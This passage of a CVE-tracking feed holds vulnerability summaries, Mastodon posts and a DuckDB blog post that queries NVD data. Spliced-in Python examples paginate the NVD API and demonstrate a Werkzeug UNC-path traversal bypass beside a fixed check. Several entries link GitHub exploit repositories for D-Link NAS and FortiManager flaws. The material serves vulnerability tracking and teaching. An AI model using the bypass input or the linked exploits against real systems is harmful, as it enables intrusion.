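    if total == 0:
        return {}
    return {status: (n, round(n * 100.0 / total, 2))
            for status, n in counts.most_common()}


def base_score(record):
    """CVSS v3.1 base score from the first metric entry, or None when NVD has
    not analysed the CVE yet (the usual case for Received/Awaiting Analysis)."""
    metrics = record["cve"].get("metrics", {}).get("cvssMetricV31", [])
    return metrics[0]["cvssData"]["baseScore"] if metrics else None


def summarise(fetch=fake_fetch, pub_start="2024-11-08T00:00:00.000",
              pub_end="2024-11-08T23:59:59.000", results_per_page=2):
    """Fetch all pages for the window and return the summary the post computes."""
    records = list(fetch_day(fetch, pub_start, pub_end, results_per_page))
    return {
        "count": len(records),
        "status": vuln_status_breakdown(records),
        "scores": {r["cve"]["id"]: base_score(r) for r in records},
    }


if __name__ == "__main__":
    print(json.dumps(summarise(), indent=2))
```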

CVE-2024-51987
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-08T13:55:27

1 posts

### Impact

HTTP Clients created by `AddUserAccessTokenHttpClient` may use a different user's access token after a token refresh. This occurs because a refreshed token will be captured in pooled `HttpClient` instances, which may be used by a different user.

### Workarounds

Instead of using `AddUserAccessTokenHttpClient` to create an `HttpClient` that automatically adds a managed token to outgoing

1 repos


dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)


##

CVE-2024-47072
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-08T13:55:23

1 posts

### Impact

The vulnerability may allow a remote attacker to terminate the application with a stack overflow error resulting in a denial of service only by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver.

### Patches

XStream 1.4.21 detects the manipulation in the binary input stream causing the stack overflow and raises an InputManipulationExcep

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.


TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing a MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with data science/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):

INSTALL gsheets FROM community;
LOAD gsheets;

Basic usage patterns include:

-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');

-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);

And, now we can look at the “schema”:

$ duckdb -json -c "
  LOAD gsheets;
  FROM read_gsheet(
    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
    sheet = 'Sheet1'
  )
  LIMIT 1" | jq
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]

And, perform normal ops on it:

$ duckdb -table -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet='Sheet1'
)
SELECT
  Vendor,
  COUNT(Vendor) AS ct
GROUP BY
  Vendor
ORDER BY
  2 DESC"
+---------------------+----+
|       Vendor        | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               | 9  |
| NETGEAR             | 8  |
| Juniper             | 6  |
| F5                  | 6  |
| PANW                | 5  |
| Sophos              | 5  |
| DrayTek             | 3  |
| Tenda               | 3  |
| TP-Link             | 2  |
| MikroTik            | 2  |
| Dasan               | 2  |
| Check Point         | 1  |
| D-Link and TRENDnet | 1  |
| Barracuda           | 1  |
| Netis               | 1  |
| FatPipe             | 1  |
| Arcadyan            | 1  |
| Sumavision          | 1  |
+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet; I have not debugged why, yet), so this might be a good project to PR into if you need some specific functionality that is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute up to 1,000x faster (per the project’s own claim) than traditional MySQL configurations.

The system operates through dual interfaces: a MySQL wire protocol listener on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)


The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;
LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README’s practical example of this extension’s utility is its ability to interact with spatial data APIs: combined with DuckDB’s spatial extension, you can fetch GeoJSON via HTTP and process it directly as geometric objects, pulling remote spatial data sources into DuckDB analytical workflows without an intermediate download step.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (
WITH
  __req AS (
    SELECT
      http_get(
        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
      ) AS res
  ),
  __res AS (
    SELECT
      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )
      AS cves
    FROM
      __req
  )
FROM __res
);

We’ll look at that in a second, but be aware that some APIs paginate (NVD returns at most 2,000 records per request and expects you to walk startIndex forward until you reach totalResults) and this extension won’t handle that for you; you can work around it by combining this method with some shell scripting.

What that query returns is an array of deeply nested JSON records:

FROM yesterday LIMIT 3;
┌──────────────────────────────────────────────────────────────────────────────┐
│                                     cves                                     │
│                                     json                                     │
├──────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │
└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB lets us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all it’s worth:

FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘

You can add request headers, and use getenv('VAR') to fill in things like API keys from the environment rather than embedding them in the query text.
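As an added example (not code from this post or from the http_client extension), here is the same day-of-CVEs fetch done in standard-library Python with NVD's startIndex/resultsPerPage/totalResults pagination handled, which is the part the extension leaves to you. The real fetcher reads an API key from an NVD_API_KEY environment variable (that variable name is an assumption; the apiKey request header is NVD's). The five sample records and the fake server that pages through them are constructed so the example runs offline; status_breakdown reproduces the vulnStatus tally from the query above.

```python
"""Added example (not from the post or the http_client extension): walk the
NVD CVE API 2.0 with its startIndex/resultsPerPage/totalResults pagination
and tally vulnStatus, using only the standard library."""
import json
import os
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, Iterator

NVD_CVES_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0/"
NVD_MAX_PAGE = 2000  # largest resultsPerPage NVD will honour


def http_fetch(url: str) -> dict:
    """Real fetcher: GET the URL and parse the JSON envelope.

    If NVD_API_KEY is set (the variable name is this example's assumption),
    it is sent in NVD's apiKey header, which raises the rate limit.
    """
    headers = {"User-Agent": "nvd-pager-example/1.0"}
    api_key = os.environ.get("NVD_API_KEY")
    if api_key:
        headers["apiKey"] = api_key
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=60) as resp:
        return json.load(resp)


def iter_cves(pub_start: str, pub_end: str,
              fetch: Callable[[str], dict] = http_fetch,
              page_size: int = NVD_MAX_PAGE) -> Iterator[dict]:
    """Yield every 'cve' object published between pub_start and pub_end.

    Each response carries resultsPerPage (rows actually returned) and
    totalResults; keep requesting from the next startIndex until the rows
    seen reach the total, and stop early on an empty page.
    """
    start = 0
    while True:
        params = {"pubStartDate": pub_start, "pubEndDate": pub_end,
                  "startIndex": start, "resultsPerPage": page_size}
        page = fetch(NVD_CVES_URL + "?" + urllib.parse.urlencode(params))
        vulns = page.get("vulnerabilities", [])
        for item in vulns:
            yield item["cve"]
        step = page.get("resultsPerPage") or len(vulns)
        start += step
        if step == 0 or start >= page["totalResults"]:
            break


def status_breakdown(cves: Iterable[dict]) -> dict:
    """Count vulnStatus values and express each as a percentage of the total."""
    counts = Counter(c.get("vulnStatus", "Unknown") for c in cves)
    total = sum(counts.values())
    if total == 0:
        return {}
    return {status: {"ct": n, "pct": round(100.0 * n / total, 2)}
            for status, n in counts.most_common()}


# Constructed sample data (not real NVD records) so the example runs offline.
SAMPLE_CVES = [
    {"id": "CVE-0000-0001", "vulnStatus": "Awaiting Analysis"},
    {"id": "CVE-0000-0002", "vulnStatus": "Awaiting Analysis"},
    {"id": "CVE-0000-0003", "vulnStatus": "Received"},
    {"id": "CVE-0000-0004", "vulnStatus": "Undergoing Analysis"},
    {"id": "CVE-0000-0005", "vulnStatus": "Awaiting Analysis"},
]


def fake_fetch(url: str) -> dict:
    """Stand-in server: serve SAMPLE_CVES in the NVD 2.0 envelope, honouring
    the startIndex/resultsPerPage query parameters like the real API."""
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    start = int(qs["startIndex"][0])
    size = int(qs["resultsPerPage"][0])
    chunk = SAMPLE_CVES[start:start + size]
    return {"resultsPerPage": len(chunk), "startIndex": start,
            "totalResults": len(SAMPLE_CVES), "format": "NVD_CVE",
            "version": "2.0", "vulnerabilities": [{"cve": c} for c in chunk]}


def demo(page_size: int = 2) -> dict:
    """Page through the stand-in server a few records at a time and tally."""
    cves = iter_cves("2024-11-08T00:00:00.000", "2024-11-08T23:59:59.000",
                     fetch=fake_fetch, page_size=page_size)
    return status_breakdown(cves)


if __name__ == "__main__":
    # Leave fetch at its default (http_fetch) in iter_cves to hit the real API.
    print(json.dumps(demo(), indent=2))
```

The loop advances by the resultsPerPage the server reports rather than the size it asked for, so a short final page or a server-side clamp of the page size cannot make it skip or re-read rows; dump the yielded objects as NDJSON and read_json can pick up where the SQL above left off.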

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##

CVE-2024-50340
(7.3 HIGH)

EPSS: 0.05%

updated 2024-11-06T23:39:52

1 posts

### Description When the `register_argc_argv` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. ### Resolution The `SymfonyRuntime` now ignores the `argv` values for non-cli SAPIs PHP runtimes The patch for this issue is available [here](https://github.co

Nuclei template

1 repos

alex@bouma.social at 2024-11-19T10:50:25.000Z ##

@valorin I found this one a pretty good summary: blog.nollium.com/cve-2024-5034 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.

##

CVE-2024-20484
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco Enterprise Chat and Email (ECE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of Media Routing Peripheral Interface Manager (MR PIM) traffic that is received by an affected device. An attacker co

1 repos

oversecurity@mastodon.social at 2024-11-18T11:50:04.000Z ##

CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure

CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...

🔗️ [Cyble] link.is.it/e4pce7

##

CVE-2024-20536
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted req

oversecurity@mastodon.social at 2024-11-18T11:50:04.000Z ##

CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure

CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...

🔗️ [Cyble] link.is.it/e4pce7

##

CVE-2024-10826
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

Use after free in Family Experiences in Google Chrome on Android prior to 130.0.6723.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-07T21:45:13.000Z ##

Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024

#microsoft #edge #chrome #chromium #vulnerability #CVE

##

CVE-2024-10827
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-07T21:45:13.000Z ##

Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024

#microsoft #edge #chrome #chromium #vulnerability #CVE

##

CVE-2024-42509
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

3 posts

Command injection vulnerability in the underlying CLI service could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

rhudaur@flipboard.com at 2024-11-12T21:44:53.000Z ##

HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points
thecyberexpress.com/hpe-securi

Posted into Cybersecurity Today @cybersecurity-today-rhudaur

##

jos1264@social.skynetcloud.site at 2024-11-12T11:35:03.000Z ##

HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points thecyberexpress.com/hpe-securi #ArubaNetworkingAccessPoint #SecurityVulnerabilities #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202442509 #CVE202447460 #CyberNews #AOS10 #AOS8

##

jbhall56@infosec.exchange at 2024-11-08T13:17:14.000Z ##

The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. securityweek.com/hpe-patches-c

##

CVE-2024-47460
(9.0 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

1 posts

Command injection vulnerability in the underlying CLI service could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

jbhall56@infosec.exchange at 2024-11-08T13:17:14.000Z ##

The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. securityweek.com/hpe-patches-c

##

CVE-2024-20418
(10.0 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

1 posts

A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system. This vulnerability is due to improper validation of input to the web-based management inter

jos1264@social.skynetcloud.site at 2024-11-08T01:30:02.000Z ##

Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418) fortiguard.fortinet.com/threat

##

CVE-2024-10914
(8.1 HIGH)

EPSS: 16.93%

updated 2024-11-06T15:30:46

6 posts

A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The expl

Nuclei template

5 repos

https://github.com/verylazytech/CVE-2024-10914

https://github.com/ThemeHackers/CVE-2024-10914

https://github.com/imnotcha0s/CVE-2024-10914

https://github.com/Bu0uCat/D-Link-NAS-CVE-2024-10914-

https://github.com/Egi08/CVE-2024-10914

NosirrahSec at 2024-11-15T18:49:48.710Z ##

youtu.be/-vpGswuYVg8

Wow, this is just disgusting. I have no words for this level of malfeasance.

##

decio at 2024-11-13T12:32:14.803Z ##

🚨⚠️ If you own a D-Link NAS from the ShareCenter range, it is time to act: these devices are affected by a critical "Command Injection" vulnerability that very easily lets malicious actors take control of devices exposed to the Internet.

D-Link is not offering a fix for this flaw (the models are considered EOL, i.e. no longer supported by the brand).

Affected models:

  • DNS-320 Version 1.00
  • DNS-320LW Version 1.01.0914.2012
  • DNS-325 Version 1.01, Version 1.02
  • DNS-340L Version 1.08

Recommended actions:

  • Remove Internet access from your D-Link NAS.
  • Restrict network access to specific, trusted IP addresses only.

[Technical information]
⬇️
"Command Injection Vulnerability in name parameter for D-Link NAS"
👇
netsecfish.notion.site/Command

[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
bleepingcomputer.com/news/secu

(According to Onyphe, more than 5,214 ShareCenter NAS devices are exposed on the Internet worldwide,
358 of which are currently detected online in France)

##

jbhall56@infosec.exchange at 2024-11-11T13:10:40.000Z ##

The issue, tracked as CVE-2024-10914 (CVSS score of 9.2), impacts the account management functionality of the affected devices. securityweek.com/many-legacy-d

##

DarkWebInformer@infosec.exchange at 2024-11-11T02:15:12.000Z ##

🚨POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS

darkwebinformer.com/poc-cve-20

##

CVE-2024-49767
(7.5 HIGH)

EPSS: 0.06%

updated 2024-11-05T21:35:24

1 posts

Applications using Werkzeug to parse `multipart/form-data` requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the `Request.max_form_memory_size` setting. The `Request.max_content_length` setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does no

1 repos

mmguero@infosec.exchange at 2024-11-18T19:21:17.000Z ##

Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.

Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.

Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.

Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh) and PowerShell 🪟 (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.

v24.10.1...v24.11.0

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov

##

CVE-2024-8934
(6.5 MEDIUM)

EPSS: 0.04%

updated 2024-10-31T15:31:04

1 posts

A local user with administrative access rights can enter specialy crafted values for settings at the user interface (UI) of the TwinCAT Package Manager which then causes arbitrary OS commands to be executed.

CVE-2024-44252
(7.1 HIGH)

EPSS: 0.04%

updated 2024-10-30T18:30:48

1 posts

A logic issue was addressed with improved file handling. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, visionOS 2.1, tvOS 18.1. Restoring a maliciously crafted backup file may lead to modification of protected system files.

1 repos

CVE-2024-38821
(9.1 CRITICAL)

EPSS: 0.04%

updated 2024-10-28T17:59:30

1 posts

Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. For this to impact an application, all of the following must be true: * It must be a WebFlux application * It must be using Spring's static resources support * It must have a non-permitAll authorization rule applied to the static resources support

1 repos

AAKL@infosec.exchange at 2024-11-19T14:55:39.000Z ##

Broadcom has a new security advisory for critical vulnerability CVE-2024-38821, OPS/MVS Event Management & Automation support.broadcom.com/web/ecx/s #cybersecurity #infosec

##

CVE-2024-49766
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-10-26T03:47:04

1 posts

On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `//server/share`. Werkzeug's `safe_join()` relies on this check, and so can produce a path that is not safe, potentially allowing unintended access to data. Applications using Python >= 3.11, or not using Windows, are not vulnerable.
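To make the mechanism concrete, an added illustration (not Werkzeug's code): a re-creation of how ntpath.isabs() treated a path before Python 3.11, beside a check that does not depend on the Python version, both plugged into a helper shaped like a safe_join routine. The helper's name and structure are assumptions for the demonstration; ntpath is called directly so the Windows rules can be exercised on any host, and the hostile input is the `//server/share` form from the description above.

```python
"""Added illustration (not Werkzeug's code) of why an isabs() check alone
could miss UNC paths on Windows with Python < 3.11, next to a check that
does not depend on the Python version. ntpath is used directly so the
Windows rules run on any host."""
import ntpath
import posixpath


def legacy_isabs_windows(path: str) -> bool:
    """Simplified re-creation (an assumption of this example) of the pre-3.11
    ntpath.isabs() rule: strip the drive, then require that the remainder
    start with a separator. A UNC path such as //server/share is entirely
    'drive', so the remainder is empty and the answer is False."""
    rest = ntpath.splitdrive(path)[1]
    return len(rest) > 0 and rest[0] in "\\/"


def is_absolute_or_unc(path: str) -> bool:
    """Version-independent check: any drive or UNC prefix, or a leading
    separator, means the path will not stay inside a base directory."""
    drive, rest = ntpath.splitdrive(path)
    return bool(drive) or rest[:1] in ("\\", "/")


def safe_join_example(directory: str, *pathnames: str,
                      isabs=is_absolute_or_unc):
    """Join untrusted path parts under directory; return None if the result
    would escape it. Generic safe_join shape, not Werkzeug's implementation;
    isabs is injectable so the two checks above can be compared."""
    parts = [directory or "."]
    for filename in pathnames:
        if filename != "":
            # POSIX normalisation keeps a leading '//' exactly as-is, so the
            # UNC form survives this step and everything rests on isabs().
            filename = posixpath.normpath(filename)
        if ("\\" in filename
                or isabs(filename)
                or filename == ".."
                or filename.startswith("../")):
            return None
        parts.append(filename)
    # posixpath.join discards earlier parts when a later one starts with '/',
    # which is exactly how a UNC path that passed isabs() replaces `directory`.
    return posixpath.join(*parts)
```

With the legacy check, `safe_join_example("static", "//server/share", isabs=legacy_isabs_windows)` hands back `//server/share` unchanged, a path that no longer lives under `static`; with the version-independent check the same call returns None, while ordinary relative names such as `css/app.css` still join normally.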

1 repos

mmguero@infosec.exchange at 2024-11-18T19:21:17.000Z ##

Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.

Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.

Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.

Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh) and PowerShell 🪟 (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.

v24.10.1...v24.11.0

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov

##

CVE-2024-47575
(9.8 CRITICAL)

EPSS: 5.18%

updated 2024-10-23T15:31:52

9 posts

A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 th

8 repos

https://github.com/HazeLook/CVE-2024-47575

https://github.com/skyalliance/exploit-cve-2024-47575

https://github.com/expl0itsecurity/CVE-2024-47575

https://github.com/groshi/CVE-2024-47575-POC

https://github.com/krmxd/CVE-2024-47575

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

https://github.com/maybelookis/CVE-2024-47575

